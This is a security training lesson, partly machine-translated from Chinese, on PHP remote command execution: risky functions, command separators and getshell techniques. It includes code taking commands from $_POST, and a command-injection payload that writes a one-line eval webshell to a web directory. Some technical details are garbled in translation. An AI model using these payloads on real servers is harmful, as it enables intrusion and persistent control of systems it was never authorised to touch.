The first lesson of in-depth study of network security - Popular framework vulnerabilities (RCE-Command Execution)

---

1. RCE

------ Remote 命令执行或者代码执行, because of the abuse of the word RCE, the scope of RCE is relatively wide. As long as the final situation of penetration can realize the execution of commands or code, it belongs to RCE, such as code execution, file inclusion, deserialization, and command execution. , even writing files Getshell can belong to RCE.

------ The RCE vulnerability allows an attacker to remotely inject operating system commands or code directly into the backend server, thereby controlling the backend system.

---

2. Command Execution/Injection-Overview

------ Applications sometimes need to call some functions that execute system commands, such as system, exec, shell_exec, passthru, popen, etc. in PHP. When users call these functions, malicious system commands can be spliced ​​into normal commands. , thus causing a command execution attack, which is a command execution vulnerability.

------ Cause of command execution: The script code of the web application is not strictly filtered when executing commands, thereby injecting a piece of code that the attacker can control and executing malicious instructions on the server.

------ Command execution vulnerabilities are one of the most common vulnerabilities in PHP applications.

------Command execution vulnerability: Directly calling operating system commands. Vulnerabilities that can execute system or application commands (such as CMD commands or bash commands). PHP command execution vulnerabilities are mainly caused by lax parameter filtering of some functions.

---

3. Command execution-common functions

Common command execution functions:

• PHP：exec、shell_exec、system、passthru、popen、proc_open等
• ASP.NET: System.Diagnostics.Start.Process, System.Diagnostics.Start.ProcessStartInfo, etc.
• Java：java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec等

---

4. PHP command execution-common functions

1、exec：

Return value: Returns the last line of the command execution result, returns false on failure

<?php
	echo exec($_POST["q"]);
?> 
<?php
	print exec($_POST["q"]);
?>

As shown below, only the last line will be output

2、system

------ This function will output the execution result and return the output result as a string.

------ If PHP is running in the server module, the system() function will also try to automatically refresh the web server's output cache after each line of output is completed, and return false if the execution fails.

<?php
	highlight_file(__FILE__);                     
	system('whoami');
?>

highlight_file() 函数以字符串形式返回 突出显示的代码，
成功返回true，否则返回false。

3、passthru

------ Execute an external program and display the raw output. This function is needed when the executed Unix command outputs binary data and needs to be sent directly to the browser.

<?php
	highlight_file(__FILE__);
	passthru('whoami');
?>

4、shell_exec

------ Execute the command through the shell and return the complete output as a string.

<?php
	highlight_file(__FILE__);
	var_dump(shell_exec('ipconfig'));  
?>

5. backquote

------ The shell_exec() function is actually just a variant of the backticked (`) operator

<?php echo `whoami`; ?>
这时候whoami会直接被当成命令来执行。

---

5. PHP command execution - summary of common functions

------ Functions that can execute commands: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open(), backticks can also execute commands

• system(), exec(), shell_exec(), passthru() and backtick (`) can directly pass in the command and the function will return the execution result.

如 <?php system('ipconfig'); ?> <?php echo `whoami`; ?>

• The popen() and proc_open() functions will not directly return the execution result, but will return a file pointer (you can perform various operations on the file it points to through the file pointer). The command has been executed.

<?php popen('whoami >>D:/2.txt','r'); ?>

---

6. Causes of command execution vulnerabilities

------ This kind of vulnerability generally occurs because the application system is designed to provide users with specified remote command operation interfaces, such as the web management interfaces of our common routers, firewalls, intrusion detection and other devices. Provide the user with a web interface for ping operation. The user enters the target IP from the web interface. After submission, the background will perform a ping test on the IP address and return the test results.

------ If the designer does not implement strict security controls when completing this function, it may cause the attacker to submit "unexpected" commands through this interface, allowing the background to execute, thereby controlling the entire background. server.

---

7. Command Execution Vulnerability Exploitation Conditions

• Application calls functions that execute system commands
• Splicing user input into the command line as parameters of system commands
• No or lax filtering of user input

---

8. Classification of command execution vulnerabilities

1. Lack of strict filtering at the code level

Some core codes of commercial applications are encapsulated in binary files and called through system functions in web applications.

2. System vulnerabilities cause command injection

bash shell breaking vulnerability (CVE-2014-6271)

3. There is a code execution vulnerability in the third-party component called.

For example, command execution vulnerability in JAVA, the ImageMagick component used to process images in WordPress
(struts2, etc.)
ThinkPHP command execution;

---

9. Commonly used commands for command execution vulnerabilities

Windows

dir----查看文件目录
ipconfig----查看Windows的IP地址
arp -a----查看ARP缓存表
calc----在命令行打开计算器
regedit----打开注册表
netstat -ano----查看开放的端口信息

Linux

cat /etc/passwd----查看passwd文件
id----查看该用户的ID号
groups----查看用户所属的组
cat /etc/group----查看组信息
whoami----查看当前用户
pwd----查看当前路径
uname -a----查看主机信息
cat /etc/issue----查看主机的配置信息
netstat -pantu----查看开放的端口信息
netstat -nr----查看路由信息

---

10. Principle of Command Execution Vulnerability

------ In the operating system, "&, |, ||" can be used as command connectors. Users submit execution commands through the browser. Since the server does not filter the execution function, the absolute value is not specified. In the case of path, execute the command.

------ Remote command execution vulnerability means that the user submits an execution operation command through the browser. Since the server side does not filter the execution function, the malicious command is executed.

---

11. Special characters used in command execution vulnerabilities

1、&

1&2 is used to separate multiple commands in a command line. Run the first command 1 first, then the second command 2.

2、&&

1&&2, run the first command 1 first, and only run the command 2 after the symbol && when the command 1 before the symbol && runs successfully.

3、|

1|2, the command line pipe symbol, immediately uses the output of command 1 as the input of command 2. It combines input and output redirection. (The following statements are executed directly)

4、||

1||2, run the first command first, and only run command 2 after the symbol || when command 1 before the symbol || fails to run successfully.

---

12. Command execution vulnerability getshell

------ The attacker directly inherits the web user permissions and can execute arbitrary commands on the server, which is particularly harmful.

The following are several common command execution exploits:

1. Get webshell directly

For example, you can write a sentence Trojan:
?cmd=echo “<?php @eval($_REQUEST[123]); ?>” > D:\phpstudy\PHPTutorial\WWW\webshell.php

2. Display the current path

For example, you can submit the parameter ?cmd=cd to view the current path.

3. Read files

For example:?cmd=type c:\windows\system32\drivers\etc\hosts to view the system hosts file.

4. Write files

For example, you can submit the parameter ?cmd=echo “<?php phpinfo(); ?>” > D:\shell.php

---